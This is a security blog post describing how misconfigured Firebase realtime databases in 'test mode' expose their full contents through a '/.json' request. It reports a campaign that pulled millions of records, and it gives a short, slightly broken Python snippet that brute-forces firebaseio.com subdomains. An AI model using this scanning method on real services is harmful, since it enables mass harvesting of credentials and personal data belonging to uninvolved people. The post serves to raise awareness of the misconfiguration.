Exploiting misconfigured Firebase Instances

Finding leaked Firebase databases is simple. However, despite this problem being well-known, it is not immediately obvious if any further actions have been taken by Google as added mitigation. UPDATE: New Firebase databases in “test mode” will expire after 30-days, databases created prior to this change are still affected.  To put into perspective the severity of this issue, my team conducted a 12-hour campaign and analyzed a treasure trove of leaked data. This campaign resulted in over 13,000,000 records including emails, passwords, phone numbers, and private messages from over 450 databases.

GasLeak is a very simple tool that abuses a feature of Firebase realtime databases. When creating a Firebase database the user is prompted to select either a “locked mode” or a “test mode”. The “locked mode” option restricts read and write, while “test mode” allows anyone to read and write. A red warning message is displayed when read and write is allowed publicly.

When a user clicks “Dismiss” this warning goes away and seemingly never appears again. This means when a developer is finished with testing and is ready to move into a production environment, it is up to them to remember that the database is in a “testing mode”. While this is no fault of Google’s, this leaves a huge opportunity for attackers to capitalize on developers.

Data is ordinarily accessed via a JSON file, as follows: https://redacted.firebaseio.com/users.json. This means that even if the database was open to the public, you would need to bruteforce the filenames. However, omitting the filename returns the entire database, skipping the need for file busting:


Now, all you have to do is abuse this feature by brute forcing subdomains. My team ran a 12-hour campaign using a wordlist generated from the Alexa Top 1 million. Example snippet:

def is_vulnerable(word):

    subdomain  = word.rstrip()

    firebase_url = f"https://{subdomain}.firebaseio.com/.json"


            response = requests.get(url)

            if response.status_code == 200:

                    return True


            return False

Gigabytes worth of leaked databases were discovered, and millions of lines of leaked credentials. Some of the interesting finds are outlined below.

PAN numbers / passbooks

Phone call / transaction logs

Appended at the bottom of 4 of these databases, it appears another researcher made their mark as well.